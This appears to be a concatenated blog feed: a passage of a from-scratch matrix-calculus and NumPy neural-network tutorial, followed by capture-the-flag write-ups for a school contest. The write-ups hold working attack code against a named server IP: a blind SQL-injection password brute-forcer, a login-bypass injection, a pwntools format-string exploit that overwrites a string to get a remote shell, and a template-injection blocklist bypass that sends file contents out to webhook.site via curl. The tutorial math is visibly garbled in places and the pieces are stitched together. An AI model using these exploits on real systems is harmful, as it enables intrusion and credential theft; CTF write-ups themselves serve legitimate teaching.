We then square it giving rise to the second "2". Now we define and do the same thing we did with $A\mathbf{x}-\mathbf{b}$, $|{\mathbf {y}}|_{2}^{2}$ is $f:\mathbb{R}^{n} \rightarrow \mathbb{R}$. Hence, the derivative is a row vector.

$$
\begin{aligned}
z&=|{\mathbf {y}}|*{2}^{2}\
&={\mathbf {y}}*{1}^{2} + {\mathbf {y}}_{2}^{2}
\end{aligned}
$$

Now we calculate the Gradient (remember that it is transposed) by calculating the individual derivative for every value.

$$
\begin{aligned}
\frac{\partial F(\mathbf{x})}{\partial\mathbf{y}} &=
\begin{bmatrix}
\frac{\partial F(\mathbf{x})}{\partial{\mathbf{y}}*{1}} & \frac{\partial F(\mathbf{x})}{\partial{\mathbf{y}}*{2}}
\end{bmatrix} \
\frac{\partial F(\mathbf{x})}{\partial{\mathbf{y}}*{1}} &= 2\mathbf{y}*{1} \
\frac{\partial F(\mathbf{x})}{\partial{\mathbf{y}}*{2}} &= 2\mathbf{y}*{2} \
\frac{\partial F(\mathbf{x})}{\partial\mathbf{y}} &=
\begin{bmatrix}
2\mathbf{y}*{1} & 2\mathbf{y}*{2}
\end{bmatrix}
= 2\mathbf{y}^{T}
\end{aligned}
$$

To illustrate the chain rule, I will calculate it individually and put it all together.

$$
\begin{aligned}
F(\mathbf{x}) &= {||A\mathbf{x}-\mathbf{b}||}*{2}^{2} \
&= {({a}*{11}{\mathbf{x}}*{1} + {a}*{12}{\mathbf{x}}*{2}-{\mathbf{b}}*{1})}^{2} +
{({a}*{21}{\mathbf{x}}*{1} + {a}*{22}{\mathbf{x}}*{2}-{\mathbf{b}}_{2})}^{2} \
\end{aligned}
$$

Now we calculate the Final Gradient by calculating the individual derivative for every value.

$$
\begin{aligned}
\frac{\partial F(\mathbf{x})}{\partial\mathbf{x}} &=
\begin{bmatrix}
\frac{\partial F(\mathbf{x})}{\partial{\mathbf{x}}*{1}} & \frac{\partial F(\mathbf{x})}{\partial{\mathbf{x}}*{2}}
\end{bmatrix}\
\frac{\partial F(\mathbf{x})}{\partial{\mathbf{x}}*{1}} &= 2{a}*{11}({a}*{11}{\mathbf{x}}*{1} + {a}*{12}{\mathbf{x}}*{2}-{\mathbf{b}}*{1}) + 2{a}*{21}({a}*{21}{\mathbf{x}}*{1} + {a}*{22}{\mathbf{x}}*{2}-{\mathbf{b}}*{2})\
\frac{\partial F(\mathbf{x})}{\partial{\mathbf{x}}*{2}} &= 2{a}*{12}({a}*{11}{\mathbf{x}}*{1} + {a}*{12}{\mathbf{x}}*{2}-{\mathbf{b}}*{1}) + 2{a}*{22}({a}*{21}{\mathbf{x}}*{1} + {a}*{22}{\mathbf{x}}*{2}-{\mathbf{b}}*{2})\
\frac{\partial F(\mathbf{x})}{\partial\mathbf{x}} &=
\begin{bmatrix}
2{a}*{11}({a}*{11}{\mathbf{x}}*{1} + {a}*{12}{\mathbf{x}}*{2}-{\mathbf{b}}*{1}) + 2{a}*{21}({a}*{21}{\mathbf{x}}*{1} + {a}*{22}{\mathbf{x}}*{2}-{\mathbf{b}}*{2}) & 2{a}*{12}({a}*{11}{\mathbf{x}}*{1} + {a}*{12}{\mathbf{x}}*{2}-{\mathbf{b}}*{1}) + 2{a}*{22}({a}*{21}{\mathbf{x}}*{1} + {a}*{22}{\mathbf{x}}*{2}-{\mathbf{b}}*{2})
\end{bmatrix}\
&= 2
\begin{bmatrix}
{a}*{11}{\mathbf{x}}*{1} + {a}*{12}{\mathbf{x}}*{2}-{\mathbf{b}}*{1} &
{a}*{21}{\mathbf{x}}*{1} + {a}*{22}{\mathbf{x}}*{2}-{\mathbf{b}}*{2}
\end{bmatrix}
\begin{bmatrix}
{a}*{11} & {a}*{12} \
{a}*{21} & {a}*{22} \
\end{bmatrix} = 2{(A\mathbf{x}-\mathbf{b})}^{T}A
\end{aligned}
$$

As we can see from that last step, its pretty complex an expression, but you can see how neat matrix notation is as compared to writing all that out and you see how matrix calculus works. With numerator layout, its very similar to single-variable but with a few extra steps.

I then transpose the derivative back into the denominator layout written below. The step function is also written below which we will use for the gradient descent.

$$
\begin{aligned}
F(\mathbf{x}) &= {||A\mathbf{x}-\mathbf{b}||}^{2} \
\nabla F(\mathbf {x} ) &= 2 A^{T}(A\mathbf {x} -\mathbf{b}) \
\mathbf{x}*{n+1} &= \mathbf{x}*{n}-\gamma \nabla F(\mathbf {x} _{n})
\end{aligned}
$$

where $\gamma$ is the learning rate, we need a small learning rate as it prevents the function from taking large steps and objective functions tend to overblow the "true" error of a function.

We can now implement this in code form for a very simple linear system written below:

$$ \begin{aligned} w+3x+2y-z=9\ 5w+2x+y-2z=4\ x+2y+4z=24\ w+x-y-3z=-12 \end{aligned} $$

This can be written as such in matrix form:

\begin{bmatrix} 9\ 4\ 24\ -12 \end{bmatrix} $$

$$ A= \begin{bmatrix} 1 & 3 & 2 & -1\ 5 & 2 & 1 & -2\ 0 & 1 & 2 & 4\ 1 & 1 & -1 & -3 \end{bmatrix} $$

```
>>> A = np.array([[1,3,2,-1],[5,2,1,-2],[0,1,2,4],[1,1,-1,-3]], dtype=np.float64)
>>> A
array([[ 1., 3., 2., -1.],
[ 5., 2., 1., -2.],
[ 0., 1., 2., 4.],
[ 1., 1., -1., -3.]])
```

$$ \mathbf{b}= \begin{bmatrix} 9\ 4\ 24\ -12 \end{bmatrix} $$

```
>>> b = np.array([[9],[4],[24],[-12]], dtype=np.float64)
>>> b
array([[ 9.],
[ 4.],
[ 24.],
[-12.]])
```

$$ \mathbf{x}= \begin{bmatrix} w\ x\ y\ z \end{bmatrix} $$

```
>>> x = np.random.rand(4,1)
>>> x
array([[0.09257854],
[0.16847643],
[0.39120624],
[0.78484474]])
```

$$ F(\mathbf{x}) = {||A\mathbf{x}-\mathbf{b}||}^{2} $$

```
>>> def objective_function(x):
return np.linalg.norm(np.matmul(A,x) - b) ** 2
```

$$ \nabla F(\mathbf {x} )=2A^{T}(A\mathbf {x} -\mathbf {b}) $$

```
>>> def objective_function_derivative(x):
return 2 * np.matmul(A.T, np.matmul(A,x) - b)
```

In this case, I implemented an arbritary learning rate and arbritary step count. In traditional non-machine learning gradient descent, the learning rate changes per step and is determined via a heuristic such as the Barzilai–Borwein method, however this is not necessary as gradient descent is very robust. I used an arbritary step count for simplicity but you should ideally use some sort of boolean condition to break the loop such as $F(\mathbf{x})<0.01$.

$$
\mathbf {x}*{n+1}=\mathbf {x}*{n}-\gamma \nabla F(\mathbf {x} _{n})
$$

```
>>> learning_rate = 0.01
>>> for i in range(5000):
x -= learning_rate * objective_function_derivative(x)
>>> x
array([[1.],
[2.],
[3.],
[4.]])
```

And to check, we now use a simple matrix multiplication:

```
>>> np.matmul(A,x)
array([[ 9.],
[ 4.],
[ 24.],
[-12.]])
```

Voila, we have solved the equation with gradient descent, and the solution is super close. This shows the power of gradient descent.

To understand the math behind a deep neural network layer, we will first look at the single perceptron case.

$$ z=xw+b\ a=\sigma (z) $$

where $w$ is the weight, $b$ is the bias, $x$ is the input, $\sigma$ is the activation function and $a$ is the output.

We assume that this is a single layer network and that the loss function is just applied after, and we will just use the MSE loss.

$$c = {(a-y)}^2$$

where $y$ is the true y, $c$ is the cost.

In this case, it is quite easy to represent. Let us expand it to a layer with 4 input neurons and 4 output neurons.

$$
\begin{aligned}
{w}*{11}{x}*{1} + {w}*{21}{x}*{2} + {w}*{31}{x}*{3} + {w}*{41}{x}*{4} + {b}*{1} = &{z}*{1}\
{w}*{12}{x}*{1} + {w}*{22}{x}*{2} + {w}*{32}{x}*{3} + {w}*{42}{x}*{4} + {b}*{2} = &{z}*{2}\
{w}*{13}{x}*{1} + {w}*{23}{x}*{2} + {w}*{33}{x}*{3} + {w}*{43}{x}*{4} + {b}*{3} = &{z}*{3}\
{w}*{14}{x}*{1} + {w}*{24}{x}*{2} + {w}*{34}{x}*{3} + {w}*{44}{x}*{4} + {b}*{4} = &{z}*{4}\
{a}*{1}=\sigma(&{z}*{1})\
{a}*{2}=\sigma(&{z}*{2})\
{a}*{3}=\sigma(&{z}*{3})\
{a}*{4}=\sigma(&{z}*{4})\
c = \frac{1}{4} \left((a_1-y_1)^2 + (a_2 - y_2)^2 + (a_3 - y_3)^2 + (a_4 - y_4)^2\right)
\end{aligned}
$$

As you can see, this is just a linear system much like the one showed in the example and it becomes very simple.

$$ \begin{aligned} \mathbf{z} &= W\mathbf{x} + \mathbf{b}\ \mathbf{a} &= \sigma(\mathbf{z}) \ c &= \frac{1}{n} ||\mathbf{a} - \mathbf{y}||^2_2 \end{aligned} $$

From our work earlier we know that:

$$ \begin{aligned} \frac{\partial \mathbf{z}}{\partial \mathbf{b}}&=I \ \frac{\partial \mathbf{z}}{\partial \mathbf{x}}&= W \ \frac{\partial c}{\partial \mathbf{a}} &= \frac{2}{n} \left(\mathbf{a} - \mathbf{y} \right)^\text{T} \end{aligned} $$

However we have once again hit a speedbump. How do we find the derivative of a vector $\mathbf{z}$ with respect to a matrix $W$? The function is of the form $f:\mathbb{R}^{m \times n} \rightarrow \mathbb{R}^{m}$. Hence, the derivative will be a third order tensor also known as a 3D matrix. (colloquially) But for now we will use a trick to dodge the usage of third order tensors because of the nature of the function $W\mathbf{x}$. For this example, I use $m=3$ and $n=2$ but its generalizable for any sizes.

$$
\begin{aligned}
\mathbf{z} = W\mathbf{x} + \mathbf{b}\
\begin{bmatrix}
{\mathbf{z}}*{1} \
{\mathbf{z}}*{2} \
{\mathbf{z}}*{3}
\end{bmatrix} &= \begin{bmatrix}
{w}*{11} & {w}*{12}\
{w}*{21} & {w}*{22}\
{w}*{31} & {w}*{32}\
\end{bmatrix}
\begin{bmatrix}
{\mathbf{x}}*{1} \
{\mathbf{x}}*{2}
\end{bmatrix}
+
\begin{bmatrix}
{\mathbf{b}}*{1} \
{\mathbf{b}}*{2} \
{\mathbf{b}}*{3}
\end{bmatrix} \
&=
\begin{bmatrix}
{w}*{11}{\mathbf{x}}*{1} + {w}*{12}{\mathbf{x}}*{2} + {\mathbf{b}}*{1}\
{w}*{21}{\mathbf{x}}*{1} + {w}*{22}{\mathbf{x}}*{2} + {\mathbf{b}}*{2}\
{w}*{31}{\mathbf{x}}*{1} + {w}*{32}{\mathbf{x}}*{2} + {\mathbf{b}}_{3}\
\end{bmatrix}
\end{aligned}
$$

We now calculate the individual derivatives of $\mathbf{z}$ wrt to $W$.

$$
\begin{aligned}
\frac{\partial \mathbf{z}*{1}}{\partial w*{11}}=\mathbf{x}*{1}\quad
\frac{\partial \mathbf{z}*{2}}{\partial w_{11}}=0\quad
\frac{\partial \mathbf{z}*{3}}{\partial w*{11}}=0\
\frac{\partial \mathbf{z}*{1}}{\partial w*{12}}=\mathbf{x}*{2}\quad
\frac{\partial \mathbf{z}*{2}}{\partial w_{12}}=0\quad
\frac{\partial \mathbf{z}*{3}}{\partial w*{12}}=0\
\frac{\partial \mathbf{z}*{1}}{\partial w*{21}}=0\quad
\frac{\partial \mathbf{z}*{2}}{\partial w*{21}}=\mathbf{x}*{1}\quad
\frac{\partial \mathbf{z}*{3}}{\partial w_{21}}=0\
\frac{\partial \mathbf{z}*{1}}{\partial w*{22}}=0\quad
\frac{\partial \mathbf{z}*{2}}{\partial w*{22}}=\mathbf{x}*{2}\quad
\frac{\partial \mathbf{z}*{3}}{\partial w_{22}}=0\
\frac{\partial \mathbf{z}*{1}}{\partial w*{31}}=0\quad
\frac{\partial \mathbf{z}*{2}}{\partial w*{31}}=0\quad
\frac{\partial \mathbf{z}*{3}}{\partial w*{31}}=\mathbf{x}*{1}\
\frac{\partial \mathbf{z}*{1}}{\partial w_{32}}=0\quad
\frac{\partial \mathbf{z}*{2}}{\partial w*{32}}=0\quad
\frac{\partial \mathbf{z}*{3}}{\partial w*{32}}=\mathbf{x}_{2}\
\end{aligned}
$$

We see that this is a pretty complex looking tensor but we see that a majority of the values are 0 allowing us to pull of an epic hack by considering the fact that at the end we are essentially trying to get a singular scalar value (the loss) and find the partial derivative of that wrt to $W$. There are some steps involved in getting from $\mathbf{z}$ to $c$ but for simplicity instead of showing everything, we will condense all of this into a function $f:\mathbb{R}^{n} \rightarrow \mathbb{R}$ which is defined as $c=f(\mathbf{z})$. In this case, we know the tensor values and we know the gradient and what the derivative should be. Hence, we now just evaluate it and see if we can see any property:

\mathbf{x}\frac{\partial c}{\partial\mathbf{z}} \end{aligned} $$

Wonderful, we have just found out this amazing method, where we just add $\mathbf{x}$ to the front. Normally this method is not possible but it is just possible in this special case as we dont have to consider terms such as $\frac{\partial c}{\partial{\mathbf{z}}*{2}}\frac{\partial {\mathbf{z}}*{2}}{\partial{w}_{11}}$ because they are just 0. It helps us dodge all the possibilites of tensor calculus (at least for now) and allows the NumPy multiplication to be much easier. $f$ can also generalize for any vector to scalar function, not just the specific steps we make.

The next speedbump is much more easier to grasp than the last one, and that is element-wise operations. In this case, we have the activation function $\sigma:\mathbb{R}^{n} \rightarrow \mathbb{R}^{n}$ or $\sigma:\mathbb{R} \rightarrow \mathbb{R}$, which looks like a sigmoid function, but this is just a placeholder function. It can be any $\mathbb{R}$ to $\mathbb{R}$ activation function, such as $\text{RELU}(x) = \text{max}(x, 0)$, or whatever else has been found in research, such as SMELU and GELU. Once again, we work it out for every single value, as shown below:

\begin{bmatrix}
\sigma({\mathbf{z}}*{1}) \
\sigma({\mathbf{z}}*{2}) \
\sigma({\mathbf{z}}_{3})
\end{bmatrix}
\end{aligned}
$$

Now for the 48th billion time, we calculate the Jacobian by calculating every individual derivative to get the general property of the operation.

$$
\begin{aligned}
\frac{\partial \mathbf{a}}{\partial \mathbf{z}} &=
\begin{bmatrix}
\frac{\partial {\mathbf{a}}*{1}}{\partial{\mathbf{z}}*{1}} & \frac{\partial {\mathbf{a}}*{1}}{\partial{\mathbf{z}}*{2}}& \frac{\partial {\mathbf{a}}*{1}}{\partial{\mathbf{z}}*{3}}\
\frac{\partial {\mathbf{a}}*{2}}{\partial{\mathbf{z}}*{1}} & \frac{\partial {\mathbf{a}}*{2}}{\partial{\mathbf{z}}*{2}} & \frac{\partial {\mathbf{a}}*{2}}{\partial{\mathbf{z}}*{3}}\
\frac{\partial {\mathbf{a}}*{3}}{\partial{\mathbf{z}}*{1}} & \frac{\partial {\mathbf{a}}*{3}}{\partial{\mathbf{z}}*{2}} & \frac{\partial {\mathbf{a}}*{3}}{\partial{\mathbf{z}}*{3}}
\end{bmatrix}\
\frac{\partial {\mathbf{a}}*{1}}{\partial{\mathbf{z}}*{1}}=\sigma^{'}(\mathbf{z}*{1})\quad
\frac{\partial {\mathbf{a}}*{1}}{\partial{\mathbf{z}}*{2}}&=0\quad
\frac{\partial {\mathbf{a}}*{1}}{\partial{\mathbf{z}}*{3}}=0\
\frac{\partial {\mathbf{a}}*{2}}{\partial{\mathbf{z}}*{1}}=0\quad
\frac{\partial {\mathbf{a}}*{2}}{\partial{\mathbf{z}}*{2}}&=\sigma^{'}(\mathbf{z}*{2})\quad
\frac{\partial {\mathbf{a}}*{2}}{\partial{\mathbf{z}}*{3}}=0\
\frac{\partial {\mathbf{a}}*{3}}{\partial{\mathbf{z}}*{1}}=0\quad
\frac{\partial {\mathbf{a}}*{3}}{\partial{\mathbf{z}}*{2}}&=0\quad
\frac{\partial {\mathbf{a}}*{3}}{\partial{\mathbf{z}}*{3}}=\sigma^{'}(\mathbf{z}*{3})\
\frac{\partial \mathbf{a}}{\partial \mathbf{z}} &=
\begin{bmatrix}
\sigma^{'}(\mathbf{z}*{1}) & 0 & 0\
0 & \sigma^{'}(\mathbf{z}*{2}) & 0\
0 & 0 & \sigma^{'}(\mathbf{z}*{3})\
\end{bmatrix}
=diag(\sigma^{'}(\mathbf{z}))
\end{aligned}
$$

As you see, we can reduce this derivative to this specific value. I have used the $diag$ operator which converts a vector to a diagonal matrix. Finally, after all this derivation (mathematically and figuratively) we can use chain rule to join everything together:

$$ \begin{aligned} \frac{\partial c}{\partial \mathbf{b}}=\frac{\partial c}{\partial \mathbf{a}}\frac{\partial \mathbf{a}}{\partial \mathbf{z}}\frac{\partial \mathbf{z}}{\partial \mathbf{b}} &= \frac{2}{n}{(\mathbf{a}-\mathbf{y})}^{T}diag(\sigma^{'}(\mathbf{z}))\ \frac{\partial c}{\partial \mathbf{x}}=\frac{\partial c}{\partial \mathbf{a}}\frac{\partial \mathbf{a}}{\partial \mathbf{z}}\frac{\partial \mathbf{z}}{\partial \mathbf{x}} &= \frac{2}{n}{(\mathbf{a}-\mathbf{y})}^{T}diag(\sigma^{'}(\mathbf{z}))W\ \frac{\partial c}{\partial W}=\frac{\partial c}{\partial \mathbf{a}}\frac{\partial \mathbf{a}}{\partial \mathbf{z}}\frac{\partial \mathbf{z}}{\partial W} &= \frac{2}{n}\mathbf{x}{(\mathbf{a}-\mathbf{y})}^{T}diag(\sigma^{'}(\mathbf{z})) \end{aligned} $$

Now that we got these simple definitions for the single-layer case, we can expand it to the multi-layer case.

$$
\begin{aligned}
\mathbf{a}*{0}&=\mathbf{x}\
\mathbf{z}*{i}&={W}*{i-1}{\mathbf{a}}*{i-1} + \mathbf{b}*{i-1}\
\mathbf{a}*{i}&=\sigma(\mathbf{z}*{i})\
i &= 1,2,3,...,L\
c&=\frac{1}{n}|{\mathbf{a}-\mathbf {y}}|*{2}^{2}
\end{aligned}
$$

We can do the calculus for the $i$-th layer now, specifically for bias and weight using the chain rule.

$$
\begin{aligned}
\frac{\partial c}{\partial \mathbf{b}*{i-1}}=\frac{\partial c}{\partial \mathbf{a}*{L}}\frac{\partial \mathbf{a}*L}{\partial \mathbf{z}*{L}}\frac{\partial \mathbf{z}*{L}}{\partial \mathbf{a}*{L-1}}\cdots\frac{\partial \mathbf{a}*{i}}{\partial \mathbf{z}*{i}}\frac{\partial \mathbf{z}*{i}}{\partial \mathbf{b}*{i-1}}&=
\frac{2}{n}{(\mathbf{a}*L-\mathbf{y})}^{T}diag(\sigma^{'}(\mathbf{z} L))W{L-1}\cdots diag(\sigma^{'}(\mathbf{z}i))\
\frac{\partial c}{\partial W{i-1}}=\frac{\partial c}{\partial \mathbf{a}*{L}}\frac{\partial \mathbf{a}

Now it is time to actually implement this network (finally).

I couldn't find a good, but rather small dataset because most people really do like large datasets and are infuriated when they are not provided that like ~~entitled brats~~ normal people. So, instead, I decided that we will train our neural network to mimic the XNOR gate.

Oh no! Training? Testing? What is that? In all fairness, I am simply trying to show you that the mathematical functions that dictate neural networks as we have found above, fits perfectly with this task of a neural network, and that these neural networks that everyone hears about can really just mimic any function.

For those who do not know, the XNOR gates inputs and outputs are written above. It is pretty suitable for this example, because the inputs and outputs are all 0 and 1, hence it is fast to train and there is no bias in the data.

From here, let's try coding out the (x,y) pairs in NumPy:

```
data = [[np.array([[0],[0]], dtype=np.float64),np.array([[1]], dtype=np.float64)],
[np.array([[0],[1]], dtype=np.float64),np.array([[0]], dtype=np.float64)],
[np.array([[1],[0]], dtype=np.float64),np.array([[0]], dtype=np.float64)],
[np.array([[1],[1]], dtype=np.float64),np.array([[1]], dtype=np.float64)]]
```

We then define a network structure. It doesn't have to be too complex because it is a pretty simple function. I decided on a $2 \rightarrow 3 \rightarrow 1$ multi-layer perceptron (MLP) structure, with the sigmoid activation function.

Next, let's try coding out our mathematical work based off the following class:

```
class NNdata:
def __init__(self):
self.a_0 = None
self.W_0 = np.random.rand(3,2)
self.b_0 = np.random.rand(3,1)
self.z_1 = None
self.a_1 = None
self.W_1 = np.random.rand(1,3)
self.b_1 = np.random.rand(1,1)
self.z_2 = None
self.a_2 = None
self.db_1 = None
self.dw_1 = None
self.db_0 = None
self.dw_0 = None
def sigmoid(self, x):
return 1 / (1 + np.exp(-x))
def sigmoid_derivative(self, x):
return self.sigmoid(x) * (1 - self.sigmoid(x))
def feed_forward(self, x):
self.a_0 = x
self.z_1 = np.matmul(self.W_0, self.a_0)+self.b_0
self.a_1 = self.sigmoid(self.z_1)
self.z_2 = np.matmul(self.W_1, self.a_1)+self.b_1
self.a_2 = self.sigmoid(self.z_2)
return self.a_2
def loss(self, y):
return np.linalg.norm(self.a_2-y)**2
def back_prop(self, y):
dcdz_2 = 2 * np.matmul((self.a_2-y).T,np.diag(self.sigmoid_derivative(self.z_2).reshape(1)))
dcdb_1 = dcdz_2
dcdw_1 = np.matmul(self.a_1, dcdz_2)
dcda_1 = np.matmul(dcdz_2, self.W_1)
dcdz_1 = np.matmul(dcda_1, np.diag(self.sigmoid_derivative(self.z_1).reshape(3)))
dcdb_0 = dcdz_1
dcdw_0 = np.matmul(self.a_0, dcdz_1)
self.db_1 = dcdb_1.T
self.dw_1 = dcdw_1.T
self.db_0 = dcdb_0.T
self.dw_0 = dcdw_0.T
```

Next I program gradient descent. There are 3 kinds of gradient descent when there are multiple datapoints, Stochastic, Batch and Mini-Batch. In Stochastic Gradient Descent (SGD), the weights are updated after a single sample is run. This will obviously cause your step towards the ideal value be very chaotic. In Batch Gradient Descent, the weights are updated after every sample is run, and the net step is the sum/average of all the $\nabla F(x)$, which is less chaotic, but steps are less frequent.

Of course, in real life, we can never know which algorithm is better without making an assumption about the data. (No Free Lunch Theorem) A good compromise is Mini-Batch Gradient Descent, which is like Batch Gradient Descent but use smaller chunks of all the datapoints every step. In this case, I use Batch Gradient Descent.

```
nndata = NNdata()
learning_rate = 0.1
for i in range(10000):
db_1_batch = []
dw_1_batch = []
db_0_batch = []
dw_0_batch = []
c = []
for j in range(4):
nndata.feed_forward(data[j][0])
c.append(nndata.loss(data[j][1]))
nndata.back_prop(data[j][1])
db_1_batch.append(nndata.db_1)
dw_1_batch.append(nndata.dw_1)
db_0_batch.append(nndata.db_0)
dw_0_batch.append(nndata.dw_0)
if((i+1) % 1000 == 0):
print("loss (%d/10000): %.3f" % (i+1, sum(c)/4))
nndata.b_1 -= learning_rate * sum(db_1_batch)
nndata.W_1 -= learning_rate * sum(dw_1_batch)
nndata.b_0 -= learning_rate * sum(db_0_batch)
nndata.W_0 -= learning_rate * sum(dw_0_batch)
```

Output resource:

```
loss (1000/10000): 0.245
loss (2000/10000): 0.186
loss (3000/10000): 0.029
loss (4000/10000): 0.007
loss (5000/10000): 0.003
loss (6000/10000): 0.002
loss (7000/10000): 0.002
loss (8000/10000): 0.001
loss (9000/10000): 0.001
loss (10000/10000): 0.001
```

Voila! We have officially programmed Neural Networks from scratch. Pat yourself on the back for reading through this. And of course, if you bothered to code this out, try porting it over to different languages like Java, JS or even C (yikes why would anyone subjects themselves to that?).

In the next part, it is time for the actual hard part. Good luck!

A lot of people think I just collated a bunch of sources and rephrased, and honestly I walked into writing this thinking I would be doing just that. The problem is that many sources who have attempted to do this, only cover the single to multi-perceptron layer case and not the multi to multi-perceptron case. Which is pretty sad. The true math is hidden behind mountains of research papers that loosely connect to give the results of this blogpot which I am too incomponent to connect by myself. So, I just did the math myself. (The math may not be presented in this way but it works so it should be correct) Yes, it was a bit crazy, and it destroyed me to my core. This was a great character building moment for me. So these are the actual sources:

- https://numpy.org/
- https://en.wikipedia.org/wiki/Gradient_descent
- https://en.wikipedia.org/wiki/Matrix_calculus
- https://en.wikipedia.org/wiki/Tensor_calculus
- https://en.wikipedia.org/wiki/Ricci_calculus
- https://en.wikipedia.org/wiki/XNOR_gate
- CS5131 Notes (Special thanks to Mr Chua and Mr Ng)

(Excruciatingly edited by Prannaya)

]]>Ok, you got the flag, but I bet you'll never get my password!

Basing off the description, the flag is probably the password. Even though we logged in as admin in the last challenge, we do not know of the password.

To get the password, we can check the password 1 character at a time to reduce the number of tries. Trying the entire password string at a time require exponential amount of tries and will be unrealistic.

The flag format is `flag{...}`

where characters consist of lower case letters, `{}`

and `_`

. We can quickly code up a little script to find the password. In this writeup we will be using `node.js`

for the simplicity and non-pythonic syntax.

```
const fetch = require("node-fetch");
const FormData = require("form-data");
let chars = "abcdefghijklmnopqrstuvwxyz_{}".split("");
let password = [];
async function verify(i, c) {
const form = new FormData();
form.append(
"username",
`admin' and SUBSTRING(password, ${i + 1}, 1)='${c}' --`,
);
const res = await fetch("http://35.240.143.82:4208/login", {
method: "POST",
body: form,
});
const text = await res.text();
return text !== "Login failed";
}
async function step(i) {
for (let c of chars) {
if (await verify(i, c)) return c;
}
return null;
}
async function brute_force() {
let i = 0;
while (true) {
password[i] = await step(i);
console.log(password.join(""));
if (!password[i]) break;
i++;
}
console.log(password.join(""));
}
brute_force();
```

As before we use `admin'`

to escape the admin field, and `--`

to skip the password check.

However we add our own check in the middle, `SUBSTRING(password, i, 1)`

works the same as normal substring would but sql is 1-indexed(kinda weird but yeh)

What would happen would be like this

`select id from users where name='admin' and SUBSTRING(password, 1, 1)='a' --`

fail`select id from users where name='admin' and SUBSTRING(password, 1, 1)='b' --`

fail- ...
`select id from users where name='admin' and SUBSTRING(password, 1, 1)='f' --`

success`select id from users where name='admin' and SUBSTRING(password, 2, 1)='a' --`

fail- ...

`verify`

will make a request to check if the password has character in variable `c`

at position `i`

.

`step`

will simply try all characters for a position until one hits.

`brute_force()`

will step through all positions until a correct character can't be found for the position, which would be most likely the end of the password

```
f
fl
fla
...
flag{oops_looks_like_youre_not_blind
flag{oops_looks_like_youre_not_blind}
flag{oops_looks_like_youre_not_blind}
flag{oops_looks_like_youre_not_blind}
```

Flag obtained

]]>Well, I haven't taken CS6131 yet but databases should be easy right??

From the description we can see the keyword databases, based on prior knowledge of the module CS6131, we can be pretty sure this is related to SQL.

Since the source operates on a simple template string SQL command, we can apply simple SQL injection and skip the password check.

```
@app.route("/login", methods=["post"])
def login():
username = request.form.get('username', default='', type=str)
password = request.form.get('password', default='', type=str)
users = db.execute(f"select id from users where name='{username}' and password='{password}'").fetchall()
if users:
return Response(flag1, mimetype='text/plain')
return Response('Login failed', mimetype='text/plain')
```

In SQL, comments can be made with `--`

To skip the password check, we can simply input `admin' --`

in username and leave password blank, which would result in the following command

```
select id from users where name='admin' --' and password=''
```

Everything behind `--`

is ignored and we successfully log in as admin

```
flag{you_can_pass_cs6131_now}
```

Flag obtained

]]>AppVenture Login page must be the most secure right? URL: http://35.240.143.82:4208/

Hint:

What's the first thing you do when pentesting a website?

One of the common files that websites contain is the `robots.txt`

, which decides what scrapers like google-bot can see and should see.

In this case the robots contains a path to the source code of the website, and the flag is inside the source code.

```
User-agent: *
Disallow: /c7179ef35b2d458d6f2f68044816e145/main.py
```

```
...
flag0 = "flag{you_can_use_automated_tools_like_nikto_to_do_this}"
...
```

Flag obtained

]]>My wonderful app works both as an echo server and a file lister!

Bet you can't hack it! `nc 35.240.143.82 4203`

Only the compiled `chal`

file was given, after decompiling it with Ghidra, I get

```
undefined8 main(void)
{
int32_t iVar1;
char *format;
setup();
while( true ) {
fgets(&format, 0x70, _stdin);
iVar1 = strncmp(&format, "quit", 4);
if (iVar1 == 0) break;
printf(&format);
}
system("/bin/ls");
return 0;
}
```

As I can see, and `printf`

has been used to print the output directly.

This challenge is in the format string attack category, which I can verify with a simple `%x`

```
$ nc 35.240.143.82 4203
%x
402004
%s
quit
```

I can use pwntools to quickly create our format string payload

I first have to find the offset which can be easily done with

```
from pwn import *
conn = remote("35.240.143.82", 4203)
context.clear(arch='amd64')
def send_payload(p):
conn.wait(1)
conn.sendline(p)
return conn.recv()
print("offset =", FmtStr(execute_fmt=send_payload).offset)
```

```
[x] Opening connection to 35.240.143.82 on port 4203
[x] Opening connection to 35.240.143.82 on port 4203: Trying 35.240.143.82
[+] Opening connection to 35.240.143.82 on port 4203: Done
[*] Found format string offset: 6
offset = 6
[*] Closed connection to 35.240.143.82 port 4203
```

In the decompiler, I noticed how `/bin/ls/`

is located at `0x00404058`

If I edit `/bin/ls/`

into `/bin/sh`

, as they have same amount of characters, I can gain remote shell access.

Hence I will be using `fmtstr_payload`

from pwntools

```
from pwn import *
conn = remote("35.240.143.82", 4203)
context.clear(arch='amd64')
payload = fmtstr_payload(0x6, {0x404058: b'/bin/sh'}, write_size='short')
conn.wait(1)
print("sending" + str(payload))
conn.sendline(payload)
print(conn.recv())
conn.sendline("quit")
conn.interactive()
```

We will be writing the string `/bin/sh`

to address `0x404058`

with offset `6`

.

After sending the payload, `/bin/ls`

will be changed to `/bin/sh`

. This means that after I exit the loop with `quit`

, it should give us shell access.

I will then switch to interactive to more easily take advantage of the shell.

```
system("/bin/sh");
```

Indeed we gain remote shell access.

By running the command `ls`

, I find `flag.txt`

, and with `cat flag.txt`

```
cat flag.txt
flag{why_would_printf_be_able_to_write_memory????!!}
```

Flag obtained

]]>If you run the following you can find the message I left

`cd ~ cd w cat README.txt Hello, I was here ;) ZY`

I've added a bunch of filters, so my app must be really secure now.

Flag in `flag.txt`

URL: http://35.240.143.82:4209/

The source, `main.py`

is included hence we should take a look.

```
import secrets
from flask import Flask, render_template_string, request
app = Flask(__name__)
@app.route("/")
def index():
name = request.args.get("name", default="World")
# Evil hacker cannot get past now!
blocklist = ["{{", "}}", "__", "subprocess", "flag", "popen", "system", "os", "import", "read", "flag.txt"]
for bad in blocklist:
name = name.replace(bad, "")
return render_template_string(f"<h1> Hello, {name}")
```

Since the server uses `render_template_string`

it's vulnerable to `{{}}`

template string attacks.

If we use `{{ 'Hello'+' '+'World' }}`

for name, it would give us `Hello World`

as the string inside is ran as code.

However as we can see, there is an blocklist, and it includes `{{`

and `}}`

.

To bypass this filter we can simply insert blocklisted words inside of blocklisted words. For example

`{flag{}flag}`

will not trigger when checking for `{{`

and `}}`

, but will have `flag`

removed when checking for flag, and would result in `{{}}`

as the end output.

Making use of this, we can construct our payloads with the help of a little script.

I had troubles with reading the file so I decided to just send the file content via curl

webhook.site is a easy to use site for sending data back

```
bypass = ["{{", "}}", "__", "subprocess", "flag", "popen", "system", "os", "import", "read"]
bypass.reverse()
payload = ''
for toby in bypass:
payload = payload.replace(toby, toby[0] + "read" + toby[1:])
print(payload)
name = payload
